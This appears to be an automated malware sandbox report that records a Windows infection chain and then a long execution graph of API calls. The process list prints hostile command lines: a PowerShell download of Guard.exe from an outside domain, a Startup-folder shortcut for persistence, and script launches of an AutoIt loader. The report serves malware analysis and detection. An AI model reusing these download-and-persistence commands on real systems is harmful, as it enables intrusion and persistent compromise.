                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1616,i,16373349634998890577,12593525989554583629,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                  Imagebase:0x7ff79c940000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:01:08:13
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\BnQwAP.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\BnQwAP.exe"
                                                                                                                  Imagebase:0x7ff655fe0000
                                                                                                                  File size:1'083'904 bytes
                                                                                                                  MD5 hash:9624FB616EDBE0DBAFD24F26424CA9E8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 30%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:01:08:13
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:01:08:13
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:01:08:18
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:01:08:18
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:01:08:23
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\Public\Guard.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                                                  Imagebase:0x3c0000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:01:08:26
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                                                  Imagebase:0xa40000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:01:08:26
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:01:08:30
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                  Imagebase:0x7ff623540000
                                                                                                                  File size:468'120 bytes
                                                                                                                  MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:01:08:30
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:01:08:35
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                                                  Imagebase:0x7ff62c6c0000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:01:08:37
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                                                  Imagebase:0x5c0000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFB4AF633B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1488205012.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffb4af60000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                    • Instruction ID: 1b0b39bf5051e249a66e7a969682178384eb6f87c8da9a925b7d8905135342c2
                                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                    • Instruction Fuzzy Hash: BE01677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3691DA36E882CB45

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:10.1%
                                                                                                                    Total number of Nodes:1557
                                                                                                                    Total number of Limit Nodes:41
                                                                                                                    execution_graph 94068 7ff655ff47e1 94069 7ff655ff4d57 94068->94069 94073 7ff655ff47f2 94068->94073 94134 7ff655feee20 5 API calls Concurrency::wait 94069->94134 94071 7ff655ff4d66 94135 7ff655feee20 5 API calls Concurrency::wait 94071->94135 94073->94071 94074 7ff655ff4df3 94073->94074 94075 7ff655ff4862 94073->94075 94136 7ff656060978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94074->94136 94096 7ff655ff3c80 94075->94096 94098 7ff655ff66c0 94075->94098 94078 7ff6560405be 94142 7ff6560634e4 77 API calls 3 library calls 94078->94142 94079 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94079->94096 94081 7ff655ff4a8f 94086 7ff655ff4ac0 94081->94086 94088 7ff65603fefe 94081->94088 94093 7ff655ff4aa9 94081->94093 94083 7ff6560405d1 94084 7ff656004f0c 34 API calls __scrt_initialize_thread_safe_statics 94084->94096 94085 7ff655ff4fe7 94089 7ff655fee0a8 4 API calls 94085->94089 94087 7ff655fee0a8 4 API calls 94092 7ff655ff3dde 94087->94092 94091 7ff655fee0a8 4 API calls 94088->94091 94089->94092 94091->94086 94093->94086 94093->94087 94095 7ff655fe9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94095->94096 94096->94078 94096->94079 94096->94081 94096->94084 94096->94085 94096->94092 94096->94093 94096->94095 94097 7ff6560050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94096->94097 94133 7ff655ff5360 301 API calls Concurrency::wait 94096->94133 94137 7ff655fee0a8 94096->94137 94141 7ff6560634e4 77 API calls 3 library calls 94096->94141 94097->94096 94110 7ff655ff673b memcpy_s Concurrency::wait 94098->94110 94099 7ff656041fac 94101 7ff656041fbe 94099->94101 94331 7ff65607ab30 301 API calls Concurrency::wait 94099->94331 94101->94096 94103 7ff655ff6d40 9 API calls 94103->94110 94105 7ff655ff6c0f 94106 7ff655ff6c3d 94105->94106 94107 7ff656041fc9 94105->94107 94328 7ff655feee20 5 API calls Concurrency::wait 94106->94328 94332 7ff6560634e4 77 API calls 3 library calls 94107->94332 94110->94099 94110->94103 94110->94105 94110->94107 94111 7ff655ff6c4a 94110->94111 94116 7ff6560420c1 94110->94116 94117 7ff655ff6c78 94110->94117 94121 7ff656042032 94110->94121 94122 7ff655fee0a8 4 API calls 94110->94122 94124 7ff655ff6b15 94110->94124 94143 7ff65607f0ac 94110->94143 94146 7ff656068e98 94110->94146 94179 7ff656083200 94110->94179 94211 7ff656065b80 94110->94211 94217 7ff6560663dc 94110->94217 94222 7ff656068ea0 94110->94222 94255 7ff656067e48 94110->94255 94289 7ff65607f160 94110->94289 94294 7ff656004c68 94110->94294 94300 7ff655ff3c20 94110->94300 94321 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94110->94321 94322 7ff655feec00 94110->94322 94327 7ff6560050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94110->94327 94334 7ff656078d98 49 API calls Concurrency::wait 94110->94334 94329 7ff656001fcc 301 API calls 94111->94329 94116->94124 94335 7ff6560634e4 77 API calls 3 library calls 94116->94335 94330 7ff655ffe8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94117->94330 94333 7ff6560634e4 77 API calls 3 library calls 94121->94333 94122->94110 94124->94096 94133->94096 94134->94071 94135->94074 94136->94096 94138 7ff655fee0bb 94137->94138 94139 7ff655fee0b6 94137->94139 94138->94096 94140 7ff655fef0ec 4 API calls 94139->94140 94140->94138 94141->94096 94142->94083 94336 7ff65607f630 94143->94336 94147 7ff65606a680 94146->94147 94152 7ff65606a71a 94147->94152 94473 7ff655fe834c 94147->94473 94150 7ff655fed4cc 48 API calls 94155 7ff65606a6d0 94150->94155 94151 7ff65606a7fd 94514 7ff656061864 6 API calls 94151->94514 94152->94151 94153 7ff65606a6f3 94152->94153 94159 7ff65606a770 94152->94159 94153->94110 94482 7ff655fe6838 94155->94482 94157 7ff65606a805 94515 7ff65605b334 94157->94515 94161 7ff655fed4cc 48 API calls 94159->94161 94160 7ff65606a6e6 94160->94153 94498 7ff655fe7ab8 94160->94498 94167 7ff65606a778 94161->94167 94164 7ff65606a7ee 94455 7ff65605b3a8 94164->94455 94165 7ff65606a7a7 94501 7ff655fe98e8 94165->94501 94167->94164 94167->94165 94168 7ff65606a7e0 Concurrency::wait 94168->94153 94518 7ff655fe8314 94168->94518 94171 7ff65606a7b5 94173 7ff655fee0a8 4 API calls 94171->94173 94174 7ff65606a7c2 94173->94174 94504 7ff655fe71f8 94174->94504 94176 7ff655fe7ab8 CloseHandle 94176->94153 94177 7ff65606a7d3 94178 7ff65605b3a8 12 API calls 94177->94178 94178->94168 94180 7ff655fe9640 4 API calls 94179->94180 94181 7ff656083231 94180->94181 94182 7ff655fed4cc 48 API calls 94181->94182 94183 7ff656083240 94182->94183 94184 7ff655fe98e8 4 API calls 94183->94184 94185 7ff656083251 94184->94185 94186 7ff655fed4cc 48 API calls 94185->94186 94187 7ff656083261 94186->94187 94188 7ff656083289 94187->94188 94190 7ff65608333f 94187->94190 94189 7ff655fed4cc 48 API calls 94188->94189 94191 7ff65608328e 94189->94191 94193 7ff6560833b0 94190->94193 94196 7ff656083359 94190->94196 94192 7ff65608329a 94191->94192 94198 7ff6560832ca 94191->94198 94573 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94192->94573 94587 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94193->94587 94574 7ff655fe7da4 94196->94574 94550 7ff655fef0ec 94198->94550 94200 7ff65608336b 94584 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94200->94584 94202 7ff656083312 94554 7ff656056f40 94202->94554 94203 7ff656083377 94205 7ff655fe7da4 4 API calls 94203->94205 94206 7ff656083395 94205->94206 94585 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94206->94585 94208 7ff656083329 94586 7ff655fe7bb8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94208->94586 94210 7ff6560832a9 Concurrency::wait 94210->94110 94212 7ff656065ba5 94211->94212 94213 7ff656065be5 FindClose 94212->94213 94214 7ff656065ba9 94212->94214 94215 7ff656065bd5 94212->94215 94213->94214 94214->94110 94215->94214 94216 7ff655fe7ab8 CloseHandle 94215->94216 94216->94214 94218 7ff655fed4cc 48 API calls 94217->94218 94219 7ff6560663f8 94218->94219 94612 7ff65605bdec 94219->94612 94221 7ff656066404 94221->94110 94223 7ff65606a680 94222->94223 94224 7ff655fe834c 5 API calls 94223->94224 94229 7ff65606a71a 94223->94229 94226 7ff65606a6be 94224->94226 94225 7ff65606a6f3 94225->94110 94227 7ff655fed4cc 48 API calls 94226->94227 94231 7ff65606a6d0 94227->94231 94228 7ff65606a7fd 94620 7ff656061864 6 API calls 94228->94620 94229->94225 94229->94228 94235 7ff65606a770 94229->94235 94232 7ff655fe6838 16 API calls 94231->94232 94234 7ff65606a6e2 94232->94234 94233 7ff65606a805 94239 7ff65605b334 4 API calls 94233->94239 94234->94229 94236 7ff65606a6e6 94234->94236 94237 7ff655fed4cc 48 API calls 94235->94237 94236->94225 94240 7ff655fe7ab8 CloseHandle 94236->94240 94238 7ff65606a778 94237->94238 94241 7ff65606a7ee 94238->94241 94243 7ff65606a7a7 94238->94243 94242 7ff65606a7e0 Concurrency::wait 94239->94242 94240->94225 94244 7ff65605b3a8 12 API calls 94241->94244 94242->94225 94246 7ff655fe8314 CloseHandle 94242->94246 94245 7ff655fe98e8 4 API calls 94243->94245 94244->94242 94247 7ff65606a7b5 94245->94247 94250 7ff65606a85c 94246->94250 94248 7ff655fee0a8 4 API calls 94247->94248 94249 7ff65606a7c2 94248->94249 94251 7ff655fe71f8 4 API calls 94249->94251 94250->94225 94252 7ff655fe7ab8 CloseHandle 94250->94252 94253 7ff65606a7d3 94251->94253 94252->94225 94254 7ff65605b3a8 12 API calls 94253->94254 94254->94242 94256 7ff656067e79 94255->94256 94257 7ff655fe9640 4 API calls 94256->94257 94286 7ff656067f55 Concurrency::wait 94256->94286 94259 7ff656067ea6 94257->94259 94258 7ff655fe834c 5 API calls 94261 7ff656067f99 94258->94261 94260 7ff655fe9640 4 API calls 94259->94260 94262 7ff656067eaf 94260->94262 94263 7ff655fed4cc 48 API calls 94261->94263 94264 7ff655fed4cc 48 API calls 94262->94264 94265 7ff656067fab 94263->94265 94266 7ff656067ebe 94264->94266 94267 7ff655fe6838 16 API calls 94265->94267 94621 7ff655fe74ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94266->94621 94269 7ff656067fba 94267->94269 94271 7ff656067fbe GetLastError 94269->94271 94275 7ff656067ff5 94269->94275 94270 7ff656067ed8 94622 7ff655fe7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94270->94622 94273 7ff656067fd8 94271->94273 94278 7ff655fe7ab8 CloseHandle 94273->94278 94281 7ff656067fe5 94273->94281 94274 7ff656067f07 94274->94286 94623 7ff65605bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94274->94623 94276 7ff655fe9640 4 API calls 94275->94276 94279 7ff656068035 94276->94279 94278->94281 94279->94281 94625 7ff656050d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94279->94625 94280 7ff656067f17 94282 7ff656067f1b 94280->94282 94280->94286 94281->94110 94284 7ff655feec00 4 API calls 94282->94284 94285 7ff656067f28 94284->94285 94624 7ff65605bab8 8 API calls Concurrency::wait 94285->94624 94286->94258 94286->94281 94288 7ff656067f31 Concurrency::wait 94288->94286 94290 7ff65607f630 164 API calls 94289->94290 94292 7ff65607f182 94290->94292 94291 7ff65607f1cd 94291->94110 94292->94291 94626 7ff655feee20 5 API calls Concurrency::wait 94292->94626 94297 7ff656004c2c 94294->94297 94295 7ff656004c50 94295->94110 94297->94294 94297->94295 94627 7ff65600925c EnterCriticalSection LeaveCriticalSection fread_s 94297->94627 94628 7ff656005600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94297->94628 94629 7ff656005620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94297->94629 94308 7ff655ff3c80 94300->94308 94301 7ff656004f0c 34 API calls __scrt_initialize_thread_safe_statics 94301->94308 94302 7ff6560405be 94632 7ff6560634e4 77 API calls 3 library calls 94302->94632 94304 7ff655ff4aa9 94310 7ff655ff4ac0 94304->94310 94311 7ff655fee0a8 4 API calls 94304->94311 94305 7ff655ff4a8f 94305->94304 94305->94310 94312 7ff65603fefe 94305->94312 94307 7ff6560405d1 94307->94110 94308->94301 94308->94302 94308->94304 94308->94305 94309 7ff655ff4fe7 94308->94309 94314 7ff655fee0a8 4 API calls 94308->94314 94316 7ff655ff3dde 94308->94316 94318 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94308->94318 94319 7ff655fe9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94308->94319 94320 7ff6560050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94308->94320 94630 7ff655ff5360 301 API calls Concurrency::wait 94308->94630 94631 7ff6560634e4 77 API calls 3 library calls 94308->94631 94313 7ff655fee0a8 4 API calls 94309->94313 94310->94110 94311->94316 94315 7ff655fee0a8 4 API calls 94312->94315 94313->94316 94314->94308 94315->94310 94316->94110 94318->94308 94319->94308 94320->94308 94323 7ff655feec1d 94322->94323 94324 7ff65603a5a2 94323->94324 94325 7ff656004c68 4 API calls 94323->94325 94326 7ff655feec55 memcpy_s 94325->94326 94326->94110 94328->94111 94329->94117 94330->94117 94331->94101 94332->94124 94333->94124 94334->94110 94335->94124 94337 7ff65607f671 __scrt_fastfail 94336->94337 94404 7ff655fed4cc 94337->94404 94341 7ff65607f759 94342 7ff65607f762 94341->94342 94343 7ff65607f840 94341->94343 94345 7ff655fed4cc 48 API calls 94342->94345 94344 7ff65607f87d GetCurrentDirectoryW 94343->94344 94346 7ff655fed4cc 48 API calls 94343->94346 94347 7ff656004c68 4 API calls 94344->94347 94348 7ff65607f777 94345->94348 94349 7ff65607f85c 94346->94349 94350 7ff65607f8a7 GetCurrentDirectoryW 94347->94350 94351 7ff655fee330 4 API calls 94348->94351 94352 7ff655fee330 4 API calls 94349->94352 94353 7ff65607f8b5 94350->94353 94354 7ff65607f783 94351->94354 94357 7ff65607f868 94352->94357 94355 7ff65607f8f0 94353->94355 94436 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94353->94436 94356 7ff655fed4cc 48 API calls 94354->94356 94364 7ff65607f905 94355->94364 94365 7ff65607f901 94355->94365 94359 7ff65607f798 94356->94359 94357->94344 94357->94355 94361 7ff655fee330 4 API calls 94359->94361 94360 7ff65607f8d0 94437 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94360->94437 94363 7ff65607f7a4 94361->94363 94367 7ff655fed4cc 48 API calls 94363->94367 94439 7ff65605fddc 8 API calls 94364->94439 94369 7ff65607f972 94365->94369 94370 7ff65607fa0f CreateProcessW 94365->94370 94366 7ff65607f8e0 94438 7ff655fff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94366->94438 94372 7ff65607f7b9 94367->94372 94442 7ff65604d1f8 99 API calls 94369->94442 94401 7ff65607f9b4 94370->94401 94375 7ff655fee330 4 API calls 94372->94375 94373 7ff65607f90e 94440 7ff65605fca8 8 API calls 94373->94440 94377 7ff65607f7c5 94375->94377 94379 7ff65607f806 GetSystemDirectoryW 94377->94379 94383 7ff655fed4cc 48 API calls 94377->94383 94378 7ff65607f926 94441 7ff65605fafc 8 API calls ~SyncLockT 94378->94441 94382 7ff656004c68 4 API calls 94379->94382 94381 7ff65607f94f 94381->94365 94384 7ff65607f830 GetSystemDirectoryW 94382->94384 94385 7ff65607f7e1 94383->94385 94384->94353 94387 7ff655fee330 4 API calls 94385->94387 94386 7ff65607fabe CloseHandle 94388 7ff65607facc 94386->94388 94389 7ff65607faf5 94386->94389 94390 7ff65607f7ed 94387->94390 94443 7ff65605f7dc 94388->94443 94392 7ff65607fafe 94389->94392 94396 7ff65607fb26 CloseHandle 94389->94396 94390->94353 94390->94379 94400 7ff65607faa3 94392->94400 94394 7ff65607fa64 94397 7ff65607fa84 GetLastError 94394->94397 94396->94400 94397->94400 94427 7ff65605f51c 94400->94427 94401->94386 94401->94394 94405 7ff655fed50b 94404->94405 94418 7ff655fed4f2 94404->94418 94406 7ff655fed513 94405->94406 94407 7ff655fed53e 94405->94407 94448 7ff65600956c 31 API calls 94406->94448 94411 7ff655fed550 94407->94411 94415 7ff656039bbc 94407->94415 94417 7ff656039cc4 94407->94417 94410 7ff655fed522 94416 7ff655feec00 4 API calls 94410->94416 94449 7ff656004834 46 API calls 94411->94449 94412 7ff656039cdc 94419 7ff656004c68 4 API calls 94415->94419 94422 7ff656039c3e Concurrency::wait wcscpy 94415->94422 94416->94418 94451 7ff656009538 31 API calls 94417->94451 94423 7ff655fee330 94418->94423 94420 7ff656039c0a 94419->94420 94421 7ff655feec00 4 API calls 94420->94421 94421->94422 94450 7ff656004834 46 API calls 94422->94450 94424 7ff655fee342 94423->94424 94425 7ff656004c68 4 API calls 94424->94425 94426 7ff655fee361 wcscpy 94425->94426 94426->94341 94428 7ff65605f7dc CloseHandle 94427->94428 94429 7ff65605f52a 94428->94429 94452 7ff65605f7b8 94429->94452 94432 7ff65605f7b8 ~SyncLockT CloseHandle 94433 7ff65605f53c 94432->94433 94434 7ff65605f7b8 ~SyncLockT CloseHandle 94433->94434 94435 7ff65605f545 94434->94435 94435->94110 94436->94360 94437->94366 94438->94355 94439->94373 94440->94378 94441->94381 94442->94401 94444 7ff65605f7b8 ~SyncLockT CloseHandle 94443->94444 94445 7ff65605f7ee 94444->94445 94446 7ff65605f7b8 ~SyncLockT CloseHandle 94445->94446 94447 7ff65605f7f7 94446->94447 94448->94410 94449->94410 94450->94417 94451->94412 94453 7ff65605f7c9 CloseHandle 94452->94453 94454 7ff65605f533 94452->94454 94453->94454 94454->94432 94456 7ff65605b42a 94455->94456 94457 7ff65605b3c8 94455->94457 94460 7ff65605b334 4 API calls 94456->94460 94458 7ff65605b41e 94457->94458 94459 7ff65605b3d0 94457->94459 94528 7ff65605b458 8 API calls 94458->94528 94462 7ff65605b3dd 94459->94462 94463 7ff65605b3f1 94459->94463 94472 7ff65605b410 Concurrency::wait 94460->94472 94524 7ff655fea368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94462->94524 94526 7ff655fea368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94463->94526 94466 7ff65605b3f6 94527 7ff65605b270 6 API calls 94466->94527 94467 7ff65605b3e2 94525 7ff656004120 6 API calls 94467->94525 94470 7ff65605b3ef 94521 7ff65605b384 94470->94521 94472->94168 94474 7ff656004c68 4 API calls 94473->94474 94475 7ff655fe8363 94474->94475 94476 7ff655fe8314 CloseHandle 94475->94476 94477 7ff655fe836f 94476->94477 94529 7ff655fe9640 94477->94529 94479 7ff655fe8378 94480 7ff655fe8314 CloseHandle 94479->94480 94481 7ff655fe8380 94480->94481 94481->94150 94483 7ff655fe8314 CloseHandle 94482->94483 94484 7ff655fe685a 94483->94484 94485 7ff65602caa8 94484->94485 94486 7ff655fe687d CreateFileW 94484->94486 94487 7ff65602caae CreateFileW 94485->94487 94495 7ff655fe68d9 94485->94495 94491 7ff655fe68ab 94486->94491 94488 7ff65602cae6 94487->94488 94487->94491 94534 7ff655fe6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94488->94534 94490 7ff65602caf3 94490->94491 94497 7ff655fe68e4 94491->94497 94532 7ff655fe68f4 9 API calls 94491->94532 94493 7ff655fe68c1 94493->94495 94533 7ff655fe6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94493->94533 94496 7ff65605b334 4 API calls 94495->94496 94495->94497 94496->94497 94497->94152 94497->94160 94535 7ff655fe82e4 94498->94535 94502 7ff656004c68 4 API calls 94501->94502 94503 7ff655fe9918 94502->94503 94503->94171 94505 7ff655fe721c 94504->94505 94507 7ff65602cd0c 94504->94507 94506 7ff655fe7274 94505->94506 94511 7ff65602cd66 memcpy_s 94505->94511 94540 7ff655feb960 94506->94540 94510 7ff656004c68 4 API calls 94507->94510 94509 7ff655fe7283 memcpy_s 94509->94177 94510->94511 94512 7ff656004c68 4 API calls 94511->94512 94513 7ff65602cdda memcpy_s 94512->94513 94514->94157 94545 7ff65605b188 94515->94545 94519 7ff655fe833d CloseHandle 94518->94519 94520 7ff655fe832a 94518->94520 94519->94520 94520->94153 94520->94176 94522 7ff65605b334 4 API calls 